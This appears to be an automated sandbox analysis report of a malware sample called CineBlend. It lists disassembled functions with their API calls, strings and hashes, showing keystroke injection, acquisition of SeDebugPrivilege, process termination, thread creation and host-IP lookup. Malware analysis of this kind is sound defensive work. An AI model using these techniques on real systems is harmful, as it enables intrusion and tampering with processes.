PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00BA2F28
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00BA2F2C
MapVirtualKeyW.USER32(00000025,00000000), ref: 00BA2F36
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00BA2F4E
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00BA2F52
MapVirtualKeyW.USER32(00000025,00000000), ref: 00BA2F5C
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00BA2F70
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00BA2F74

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 747575d3d60ae4c4a2879ef64992e774cf3ff2431f305145ec24c8e8142a8c1a
Instruction ID: 78c38fd5f978fff9be83699ff7c2bb87b7fe2a950873db117e36581cfbd80584
Opcode Fuzzy Hash: 747575d3d60ae4c4a2879ef64992e774cf3ff2431f305145ec24c8e8142a8c1a
Instruction Fuzzy Hash: 3501D430788210BBFB1067689C8AF597F9ADB8EB11F100052F358AF1E0CDF264448AA9

Function 00BA2150 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00BA1D95,?,?,00000000), ref: 00BA2159
HeapAlloc.KERNEL32(00000000,?,00BA1D95,?,?,00000000), ref: 00BA2160
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00BA1D95,?,?,00000000), ref: 00BA2175
GetCurrentProcess.KERNEL32(?,00000000,?,00BA1D95,?,?,00000000), ref: 00BA217D
DuplicateHandle.KERNEL32(00000000,?,00BA1D95,?,?,00000000), ref: 00BA2180
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00BA1D95,?,?,00000000), ref: 00BA2190
GetCurrentProcess.KERNEL32(00BA1D95,00000000,?,00BA1D95,?,?,00000000), ref: 00BA2198
DuplicateHandle.KERNEL32(00000000,?,00BA1D95,?,?,00000000), ref: 00BA219B
CreateThread.KERNEL32(00000000,00000000,00BA21C1,00000000,00000000,00000000), ref: 00BA21B5

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: c296fa0521050b5ed182d25b811bc056d0e0e107885ccd0cb5ea477e35617b64
Instruction ID: e456164bf0b825008096171ac05ebae5cdb73b846f1b5e826d70aa2c4f7f88c7
Opcode Fuzzy Hash: c296fa0521050b5ed182d25b811bc056d0e0e107885ccd0cb5ea477e35617b64
Instruction Fuzzy Hash: 2C01BBB5241304BFE710AFA5DC4DF6B7BACEB89711F004412FA45EB2A1DA709800CB20

Function 00BCAB3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 00BADD87: CreateToolhelp32Snapshot.KERNEL32 ref: 00BADDAC
Part of subcall function 00BADD87: Process32FirstW.KERNEL32(00000000,?), ref: 00BADDBA
Part of subcall function 00BADD87: CloseHandle.KERNELBASE(00000000), ref: 00BADE87

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BCABCA
GetLastError.KERNEL32 ref: 00BCABDD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BCAC10
TerminateProcess.KERNEL32(00000000,00000000), ref: 00BCACC5
GetLastError.KERNEL32(00000000), ref: 00BCACD0
CloseHandle.KERNEL32(00000000), ref: 00BCAD21

Strings

SeDebugPrivilege, xrefs: 00BCABEC

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: a36afce877b28cee04355ec58abeb6862fa57efe4e1b78055579004b15a9419a
Instruction ID: dd32c7edeffc154f597b37c94fd2d0e4fa2ef8101fd71d9c98472f0e4a76ae78
Opcode Fuzzy Hash: a36afce877b28cee04355ec58abeb6862fa57efe4e1b78055579004b15a9419a
Instruction Fuzzy Hash: 6C618D74208245AFD310DF18C895F26BBE1EF54318F1584DCE4A68BBA2CB71ED45CB92

Function 00BD4322 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00BD43C1
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00BD43D6
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00BD43F0
_wcslen.LIBCMT ref: 00BD4435
SendMessageW.USER32(?,00001057,00000000,?), ref: 00BD4462
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00BD4490

Strings

SysListView32, xrefs: 00BD4393

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: b32832a88b61b7777e1108f8f83a975cdd12bfada919c8736279d4359a22fae2
Instruction ID: b1233e9fcc86df18b743809f5e56f413c71f473621a3a28e17f4a92f0cbd30a2
Opcode Fuzzy Hash: b32832a88b61b7777e1108f8f83a975cdd12bfada919c8736279d4359a22fae2
Instruction Fuzzy Hash: FB41A171900209ABDF219F64CC45BEABBE9FB48360F100166F948E7291E7759990CB94

Function 00BAC625 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BAC6C4
IsMenu.USER32(00000000), ref: 00BAC6E4
CreatePopupMenu.USER32 ref: 00BAC71A
GetMenuItemCount.USER32(00C970E0), ref: 00BAC76B
InsertMenuItemW.USER32(00C970E0,?,00000001,00000030), ref: 00BAC793

Strings

0, xrefs: 00BAC66F
2, xrefs: 00BAC6FE

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: f657ae0dce2967b64a09ae0a187aa71948c31c5ae5ed1d206e202e234333a8ae
Instruction ID: 4775490cc380fb94910f314d432a9b7a4ebea33b1903c7debb18d85ad4cb00a1
Opcode Fuzzy Hash: f657ae0dce2967b64a09ae0a187aa71948c31c5ae5ed1d206e202e234333a8ae
Instruction Fuzzy Hash: 6B51BE706082059BDF11CF68D9C4BAEBFF8EF56314F24429AE812A7291E7709D40CF61

Function 00BAD11F Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00BAD1BE

Strings

warning, xrefs: 00BAD1A7
question, xrefs: 00BAD177
info, xrefs: 00BAD15F
stop, xrefs: 00BAD18F
blank, xrefs: 00BAD140

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 820e2a953824bb1f4f89a730390f700527bf07e08b1554b50701adcbd12f4bec
Instruction ID: d0ad4e02911eb80059ad4a9b84030cc219e7b71dc5744b5fd6b661fd25e359a0
Opcode Fuzzy Hash: 820e2a953824bb1f4f89a730390f700527bf07e08b1554b50701adcbd12f4bec
Instruction Fuzzy Hash: 4F11DA35A4C706BAE7055F58DCC2DAE77DCDF06B60B2001BAF502B65C1EBB46E408561

Function 00BAE73E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00BAE759
gethostname.WSOCK32(?,00000100), ref: 00BAE773
gethostbyname.WSOCK32(?), ref: 00BAE780
inet_ntoa.WSOCK32(?), ref: 00BAE7C2
_strcat.LIBCMT ref: 00BAE7D0
WSACleanup.WSOCK32 ref: 00BAE7F5

Strings

0.0.0.0, xrefs: 00BAE79E

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 642191829-3771769585
Opcode ID: e569af38be95eaaa333623a846fda7090ce4f67e45a24a43a2cbdb825b3c2d16
Instruction ID: 401b3f8e416f61af81b0495872eb2d3859182526a50fe78dea1ae1b4b83f4df0
Opcode Fuzzy Hash: e569af38be95eaaa333623a846fda7090ce4f67e45a24a43a2cbdb825b3c2d16
Instruction Fuzzy Hash: C111DF31909115BBCB20AB60DC4AEEE77ECEF02710F0000E6F555A6091FF78DE81DA60

Function 00BAF630 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00BAF641
_wcslen.LIBCMT ref: 00BAF652
_wcslen.LIBCMT ref: 00BAF690
_wcslen.LIBCMT ref: 00BAF6C6
_wcslen.LIBCMT ref: 00BAF6F6
_wcslen.LIBCMT ref: 00BAF706
_wcslen.LIBCMT ref: 00BAF742
_wcslen.LIBCMT ref: 00BAF771

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: c4b54010210959e40d585b9ff9e40a218a6a3227466ca7b2eea6f5dfb36d6cfc
Instruction ID: 968e36c2fffa3c6b1d778a0aad8fc5c9bff4cd4ecb7dc81318754a9ed6e19888
Opcode Fuzzy Hash: c4b54010210959e40d585b9ff9e40a218a6a3227466ca7b2eea6f5dfb36d6cfc
Instruction Fuzzy Hash: 2C419466D11515B5CB11EBF8CC86ADFB7E8EF05310F5084A2E518E3121FB38D665C3A6

Function 00B5FBC6 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00B839E2,00000004,00000000,00000000), ref: 00B5FC41
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00B839E2,00000004,00000000,00000000), ref: 00B9FC15
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00B839E2,00000004,00000000,00000000), ref: 00B9FC98

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 05b4cfabe917cffb4f748f55290e88027c30e88728ae17877b73ef774586eaca
Instruction ID: e1c9e870f791bf5cd98959451814031010bce0d206b45b30cbb6418b01ee0d9c
Opcode Fuzzy Hash: 05b4cfabe917cffb4f748f55290e88027c30e88728ae17877b73ef774586eaca
Instruction Fuzzy Hash: 46411B3010938A9ACF358B3C89D877AFBE1EB46312F1444FDED4687964D671A848C710

Function 00BD379F Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00BD37B7
GetDC.USER32(00000000), ref: 00BD37BF
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BD37CA
ReleaseDC.USER32(00000000,00000000), ref: 00BD37D6
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00BD3812
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00BD3823
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00BD6504,?,?,000000FF,00000000,?,000000FF,?), ref: 00BD385E
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00BD387D

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 37638f16b36bc0f2a45b4b1ac43636d1bb3fa73628ac4a1eb5b165d8d5bbb854
Instruction ID: 5f70e8ac7ed4ef9e9906e586044d38d8048a70bd385bf6e8f8e059fffd53c7f0
Opcode Fuzzy Hash: 37638f16b36bc0f2a45b4b1ac43636d1bb3fa73628ac4a1eb5b165d8d5bbb854
Instruction Fuzzy Hash: 2931BF72201214BFEB154F50DC99FEB7BADEF49711F0400A6FE489B291EAB59C41C7A0

Function 00BC5A0B Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 00BC5A8B, 00BC5DE0
Not an Object type, xrefs: 00BC5A64

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: d8bb0daa86b19bd4d29999e4558cc8aaf5308ee17ad5783ed847ed0761a8a17c
Instruction ID: 5e313527e9d7b98f61b04f5b8696a05f15681048b47920b5700bd30cf7bd60c2
Opcode Fuzzy Hash: d8bb0daa86b19bd4d29999e4558cc8aaf5308ee17ad5783ed847ed0761a8a17c
Instruction Fuzzy Hash: D7D18071A0070A9FDB20DF58C885FAEB7F5EB48344F1485ADE916AB281D770AD85CB50

Function 00B818A2 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00B81B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00B8194E
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00B81B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00B819D1
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00B81B7B,?,00B81B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00B81A64
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00B81B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00B81A7B

Part of subcall function 00B73B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B60165,?,?,00BB11D9,0000FFFF), ref: 00B73BC5

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00B81B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00B81AF7
__freea.LIBCMT ref: 00B81B22
__freea.LIBCMT ref: 00B81B2E

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 937fcc9ae952466f7fc9d8688b3e1cb426ff975afdc4bd024bb0467aa44b2e91
Instruction ID: 8d427194deb682495746f253f6c25a0afc46b98ee250493603b4df4b81d3ba65
Opcode Fuzzy Hash: 937fcc9ae952466f7fc9d8688b3e1cb426ff975afdc4bd024bb0467aa44b2e91
Instruction Fuzzy Hash: 6C91D571E022169ADB24AE6CC891EEEBBFDDF09710F180A99E815E7160E735DC43C760

Function 00BC4F80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00BC50A5
VariantInit.OLEAUT32(?), ref: 00BC51A6
VariantClear.OLEAUT32(?), ref: 00BC51B0
VariantClear.OLEAUT32(?), ref: 00BC520D

Strings

Null Object assignment in FOR..IN loop, xrefs: 00BC5035, 00BC5163, 00BC521B
Incorrect Object type in FOR..IN loop, xrefs: 00BC5189

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 163df94c6cd1ec59824e74283792b691e0af8fdf0c5864b3a94f8d5d7e90f38c
Instruction ID: cd84e76c104fdeffb51fbc43664f46c80465997493a9c0dae2dccc6f9b2078de
Opcode Fuzzy Hash: 163df94c6cd1ec59824e74283792b691e0af8fdf0c5864b3a94f8d5d7e90f38c
Instruction Fuzzy Hash: 64916F71A00615ABDF208FA5CC88FAEBBF8EF45714F14859DF515AB280D770A985CFA0

Function 00BB1B46 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00BB1C1B
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00BB1C43
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00BB1C67
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00BB1C97
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00BB1D1E
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00BB1D83
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00BB1DEF

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 43e48b34a98df2424a17a33b8564b83a59e20b550da90598cbd253aaed9f87ae
Instruction ID: f3d2a258423e671747816164913f3581579402963be481cc50e5d70e7f492a83
Opcode Fuzzy Hash: 43e48b34a98df2424a17a33b8564b83a59e20b550da90598cbd253aaed9f87ae
Instruction Fuzzy Hash: B391BF72A002199FDB019F98C8A5BFEBBF4FF05711F5488A9E950EB291D7B4E940CB50

Function 00B41D7E Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: f78388a5f11a532bc347edcab6a91d55654a4824c8431af9be3c620a25424239
Instruction ID: cbceebdf170407cd7adea3554f2c50be3b06bc9cb4bca2d2214f6f815e344674
Opcode Fuzzy Hash: f78388a5f11a532bc347edcab6a91d55654a4824c8431af9be3c620a25424239
Instruction Fuzzy Hash: 1A914A75D40219AFCB10CFA9CC84AEEBBF8FF48720F148595E911B7251D7749A81DB60

Function 00BC43A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00BC43C8
CharUpperBuffW.USER32(?,?), ref: 00BC44D7
_wcslen.LIBCMT ref: 00BC44E7
VariantClear.OLEAUT32(?), ref: 00BC467C

Part of subcall function 00BB169E: VariantInit.OLEAUT32(00000000), ref: 00BB16DE
Part of subcall function 00BB169E: VariantCopy.OLEAUT32(?,?), ref: 00BB16E7
Part of subcall function 00BB169E: VariantClear.OLEAUT32(?), ref: 00BB16F3

Strings

Incorrect Parameter format, xrefs: 00BC4403, 00BC45FE
AUTOIT.ERROR, xrefs: 00BC44DD, 00BC44E2

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

